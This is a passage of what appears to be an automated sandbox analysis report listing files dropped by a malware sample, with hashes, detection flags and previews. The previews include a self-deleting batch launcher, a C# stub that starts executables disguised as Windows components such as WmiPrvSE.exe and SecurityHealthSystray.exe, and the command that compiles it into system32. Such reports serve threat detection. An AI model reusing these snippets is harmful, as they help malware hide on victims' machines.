                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)...*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1168
                                                                                                                                                                      Entropy (8bit):4.448520842480604
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                                                                                                      MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                                                                                                      SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                                                                                                      SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                                                                                                      SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4608
                                                                                                                                                                      Entropy (8bit):3.9015551915024087
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:62mBthxZ8RxeOAkFJOcV4MKe28dvcvqBHbuulB+hnqXSfbNtm:MexvxVx9EvkNTkZzNt
                                                                                                                                                                      MD5:CCB9DE638E1E5A4C636D24E89AF354B9
                                                                                                                                                                      SHA1:873673E2AC88DD0F056251850432201BAE9C0C4A
                                                                                                                                                                      SHA-256:EE7B30A37C30E937633978D4731292973F4C9BAF5498435E0C932AB9373D9197
                                                                                                                                                                      SHA-512:2BEBEB3C207F32BBEC96CA2FA7CD412837625F5FFC93D8D8B6EFD1F0C5A19B9F9E1CC8E1228CB073472E492A13D7103D2EC29DAE6412B16070A9DFE32B747EA8
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):121
                                                                                                                                                                      Entropy (8bit):5.532724605763097
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:yIULrjizTxoKBqQgY/BvXIP9DY8cUprXLrkB9:yIU3WXe4lIPhYVL
                                                                                                                                                                      MD5:86307C75705630C6666DD4EB2E37E217
                                                                                                                                                                      SHA1:62407FCEA4E47CB677CF610B9D6B723DA15FB4D8
                                                                                                                                                                      SHA-256:00D3FC5EBA4546B27C44B621BA40AA19E3AFCCE11053B3B9C9E41036C5018EA9
                                                                                                                                                                      SHA-512:FB0902E8C1F17DEDE98F9C62810EC6F313488301598DA7E7052812B6EE4DBDDD4DE9AFE8763F7AB5CDCCF1AD419C04C66FC67FF04C5F03EAD2E5206DBC017595
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:QnmUD7cZP96NNglqWiGYVVUC7gRtkzGdu0cqpW1oSIwPjbEsyZRqYwv5SjXgptzZ3cdXE4BArbGNjFdfcj5LiZF8FgXF9U8jTWVG8rn3XQ86phWNF1EGxn1dX
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1396
                                                                                                                                                                      Entropy (8bit):5.350961817021757
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                                                                                      MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                                                                                      SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                                                                                      SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                                                                                      SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                                                                                                                      Process:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):425
                                                                                                                                                                      Entropy (8bit):5.353683843266035
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                      MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                      SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                      SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                      SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):1.1940658735648508
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:NlllulJnp/p:NllU
                                                                                                                                                                      MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                                                                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                                                                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                                                                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:@...e.................................X..............@..........
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):171
                                                                                                                                                                      Entropy (8bit):5.172201104510006
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1CHyg4E2J5yIM2dASBktKcKZG1CHyg4E2J5xAIdVy:hCRLuVFOOr+DE1CHhJ23yIMmKOZG1CHB
                                                                                                                                                                      MD5:014C8989C3A393F4BC33C1184E91F334
                                                                                                                                                                      SHA1:1AA358FD58EEBA7FDE6F84975FA4EC0C64661F82
                                                                                                                                                                      SHA-256:C98ED425289C19B70A24B1AC32D3FAE7EB03E5884927CAF324B92BFE40F50285
                                                                                                                                                                      SHA-512:902622F54B151D6FB637A8165EA1889D72CCCCF05684A55141D1B844204359299360D96B878E60BF03A5352CFA402A267AE1A21603A2A5846753E4221DEFA1F7
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\FVbPldJoKd.bat"
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c0, 10 symbols, created Mon Sep 30 17:53:27 2024, 1st section name ".debug$S"
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1912
                                                                                                                                                                      Entropy (8bit):4.5958119355088
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:qaLzFd799NK80slmuulB+hnqXSfbNtmhr:9n71K80s2TkZzNtyr
                                                                                                                                                                      MD5:7D74BC22FE701F8C7E78D6F9ADD6B3FF
                                                                                                                                                                      SHA1:3BF55E5FF71E294665C009F8D4EE77706B97C8AD
                                                                                                                                                                      SHA-256:56FD56F457BF1C2BC5170E97BE68F910B8B9CF4EEB816A324645B4A8A683FE1B
                                                                                                                                                                      SHA-512:0529AE493ABF457CDD42C0BED9961738005A279C866FB67633D2F38FA96C34C6BE84B683B1B28E9542DD3C91CEF39000C92ACF368E3B7FDF5BB66738C6E2FDC9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:L......f.............debug$S........H...................@..B.rsrc$01................t...........@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP.....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES8FC0.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d8, 10 symbols, created Mon Sep 30 17:53:27 2024, 1st section name ".debug$S"
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1936
                                                                                                                                                                      Entropy (8bit):4.551788195121404
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Hha9wnOOgHJwK80NaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+OUZ:1fgSK80EluOulajfqXSfbNtmhJZ
                                                                                                                                                                      MD5:BA9EA25BD28A2C28C5C1AC699CBF5BD6
                                                                                                                                                                      SHA1:D0287F8982064931A57A8F958A5439923F2C49FF
                                                                                                                                                                      SHA-256:AEC6D42BE05C2D52731D4E1811DD93BFA1F468C69B6D62A41F1356C9CF34758D
                                                                                                                                                                      SHA-512:97F7DB76E4799A0704285EAE4EEF4F90A130A13FBF05EF9D2E4AE59FF8050FBF6B5D1544A6A22F98E1B3A40613B64BADE1F096A1F7D342409F4C97C707663D57
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:L......f.............debug$S........(...................@..B.rsrc$01................T...........@..@.rsrc$02........p...h...............@..@........;....c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP...................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES9270.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):25
                                                                                                                                                                      Entropy (8bit):4.323856189774723
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:p2FVrtuuW/:6tuuW/
                                                                                                                                                                      MD5:7DC1E85CE6B28F69D9457E8AE7647896
                                                                                                                                                                      SHA1:404124EEC0003FF9C0C9A69112F82D8E4EE3B7B9
                                                                                                                                                                      SHA-256:2EEC1A338A73D4E5E3B0417DBF92DFD885D7D0B37E06C8D4144DDB4110176862
                                                                                                                                                                      SHA-512:2604254C15AE9A951A22DAF5E80892B9C2E7741D595AF3A1458B049E9E9737519F0DD8EF89BD2C29B48F7A6876BA9AF3BFAD012229A881A99B2F5B73E43B2D1F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:tXhv5CyRaIShKKAHQ2vqf2sdZ
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):25
                                                                                                                                                                      Entropy (8bit):4.163856189774724
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:zKI30Kn:eIkKn
                                                                                                                                                                      MD5:4CA07FA17C4212E66E1DA1625708613A
                                                                                                                                                                      SHA1:12B7A2E64407290D95EF34D5588BB42989A8821F
                                                                                                                                                                      SHA-256:2DCBCC6082E3E5A57936C754C9D9A9CF15EE117A638EBB8964E0D3B8B24F8C69
                                                                                                                                                                      SHA-512:F8F88736EF250497455C63D804B83299653A2F3A142B46DB50B0A284650CFC7B3BCA1BEDC681E80530686FFD287E9C14EE84C9AE825783B2B79BB8D7D5B0F69E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:zyk4cw6cf6gnt4jrrbj1D7yM2
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):389
                                                                                                                                                                      Entropy (8bit):4.960722582391966
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLy4BiFkD:JNVQIbSfhV7TiFkMSfh+9FkD
                                                                                                                                                                      MD5:BA482B6AE07CFEFEB8E0DF7F06E7C93B
                                                                                                                                                                      SHA1:FE2E0BF2A08292566F0E4456AD177EEAB372E718
                                                                                                                                                                      SHA-256:4419C012D60CEE0E4F7E8F5A9EEF97976334424813D8121934295ACFCC598037
                                                                                                                                                                      SHA-512:56D2ED7A07EC144667098F752DC63F99795A63B29A3B3CEBCE19DAF6A86F20D9EC03A5675F035A0C5B6BA5A44FC737690197488D97B10A57E31D4DBB9AA94371
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\WmiPrvSE.exe"); } catch { } }).Start();. }.}.
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):251
                                                                                                                                                                      Entropy (8bit):5.106155237018697
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oCHhJ23fpOxkWw9:Hu7L//TRq79cQDhX
                                                                                                                                                                      MD5:88574858A72DAB9106B8F3BCB6E2BCB6
                                                                                                                                                                      SHA1:692A642FA3B4B4B015F916C1B2FF2196EFA2E61C
                                                                                                                                                                      SHA-256:134D48D8D57219FF67B77EE825EB47B504B0955A616CAC92C0A990DB997487A6
                                                                                                                                                                      SHA-512:5E7A25F05AD63C58B78193E4D2F98F9CB109682DDB3B6072808406E6D588FC3A6C61E5C4A33CABB46764FEF96291A247BC0261679C382E44E89818FE36DB2A3B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.0.cs"
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (315), with CRLF, CR line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):736
                                                                                                                                                                      Entropy (8bit):5.273248779756928
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:apI/u7L//TRq79cQDheKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/Vq79tDUKax5DqBVKVrdFAMBJj
                                                                                                                                                                      MD5:29BECB4338A339654909F83FD397959B
                                                                                                                                                                      SHA1:0CA3E0B80C4D1BFDADAF253E87F85DA24AE159DD
                                                                                                                                                                      SHA-256:14B4187CA0922B29316D6D6B2897B90E8082A17AE1EFE83EC72E70CF3C47FD3C
